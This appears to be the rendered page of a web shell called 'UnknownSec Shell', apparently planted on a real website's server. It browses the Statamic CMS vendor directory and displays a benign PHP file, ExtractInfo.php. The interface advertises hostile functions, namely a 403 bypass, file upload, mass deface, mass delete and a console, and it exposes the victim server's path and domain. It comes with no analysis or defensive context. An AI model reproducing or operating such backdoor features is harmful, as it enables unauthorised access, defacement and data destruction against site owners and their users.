shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Assets
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
ExtractInfo.php
<?php namespace Statamic\Assets; use Statamic\Contracts\Assets\Asset; class ExtractInfo { public function fromAsset(Asset $asset): array { $disk = $asset->disk()->filesystem(); $path = $asset->path(); return (new \getID3)->analyze($path, $disk->size($path), '', $disk->readStream($path)); } }
© 2026 UnknownSec